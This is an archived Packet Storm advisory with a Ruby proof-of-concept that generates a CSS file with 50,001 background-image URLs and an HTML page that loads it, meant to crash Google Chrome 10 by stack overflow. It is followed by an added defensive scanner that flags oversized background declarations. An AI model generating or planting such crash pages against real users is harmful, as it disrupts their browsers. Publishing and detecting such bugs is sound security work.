Google Chrome 10.0.648.205 Stack Overflow

2011-04-18T00:00:00
ID PACKETSTORM:100547
Type packetstorm
Reporter C4SS!0 G0M3S
Modified 2011-04-18T00:00:00

Description

                                        
```ruby
#!/usr/bin/ruby
#
#[+]Exploit Title: Google Chrome 10.0.648.205 Stack Overflow Vulnerability
#[+]Date: 17\04\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.google.com/chrome
#[+]Version: 10.0.648.205
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
#
#About:
#
#This is a stack overflow bug
#that occurs when Safari or Google Chrome
#deals with many URLs in the background-image.
#It only causes a crash and does not allow code execution.
#
#

print """

Created By C4SS!0 G0M3S
E-mail Louredo_@hotmail.com
Site www.exploit-br.org
"""

# Build a stylesheet whose background-image lists 50001 url() layers.
css = """
body
{
background-image:"""
i=0
while i<50000
  css += "url('imagem.bmp'),"
  i+=1
end
css += "url('imagem.bmp');\n}\n"

print "[+]Creating File style.css...\n"
sleep(1)
begin
  f = File.open("style.css","wb")
  f.write css
  f.close
rescue
  print "Error:\n#{$!}\n"
  exit
end
print "[+]File Style.css Created With Success\n"
sleep(1)

# Minimal page that loads the stylesheet.
HTML = '''
<html>
<head>

<link rel="stylesheet" type="text/css" href="style.css"></link>

</head>
<body>


</body>
</html>
'''
print "[+]Creating File Exploit.html...\n"
sleep(1)
begin
  f = File.open("Exploit.html","wb")
  f.write HTML
  f.close
rescue
  print "Error:\n#{$!}\n"
end
print "[+]File Exploit.html Created With Success\n"
sleep(1)
```
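
The condition described in the About comment (a very large number of URLs in one `background-image` value) can be checked for in stylesheets before they reach a browser. The scanner below is an added example, not part of the original advisory or the author's code; `MAX_LAYERS`, `split_top_level`, `scan_css` and the sample CSS are assumptions made for illustration.

```ruby
# Added example (not from the original advisory): flag CSS declarations
# with an abnormal number of background-image layers.
MAX_LAYERS = 1_000 # assumed threshold; tune to your own content

Finding = Struct.new(:selector, :property, :layers)

# Split text on sep, ignoring separators inside parentheses or quotes,
# so url(data:image/png;base64,...) stays one piece.
def split_top_level(text, sep)
  parts = [''.dup]
  depth = 0
  quote = nil
  text.each_char do |ch|
    if quote
      quote = nil if ch == quote
    elsif ch == '"' || ch == "'"
      quote = ch
    elsif ch == '('
      depth += 1
    elsif ch == ')'
      depth -= 1 if depth > 0
    elsif ch == sep && depth.zero?
      parts << ''.dup
      next
    end
    parts.last << ch
  end
  parts
end

# Return a Finding for every background / background-image declaration
# whose top-level layer count exceeds limit.
def scan_css(css, limit = MAX_LAYERS)
  findings = []
  css.gsub(%r{/\*.*?\*/}m, '').scan(/([^{}]+)\{([^{}]*)\}/m) do |selector, body|
    split_top_level(body, ';').each do |decl|
      prop, value = decl.split(':', 2)
      next unless value && prop.strip.downcase =~ /\Abackground(-image)?\z/
      layers = split_top_level(value, ',').size
      findings << Finding.new(selector.strip, prop.strip.downcase, layers) if layers > limit
    end
  end
  findings
end

# Constructed sample: one ordinary rule and one oversized rule.
SAMPLE = "a { background: url(data:image/png;base64,AA==), url(b.png); }\n" \
         "body { background-image: #{(['url(x.png)'] * 1500).join(',')}; }\n"
scan_css(SAMPLE).each { |f| puts "#{f.selector}: #{f.property} has #{f.layers} layers" }
```

The splitter does not interpret backslash escapes inside quoted strings, so treat a hit as a prompt to inspect the stylesheet rather than as a verdict.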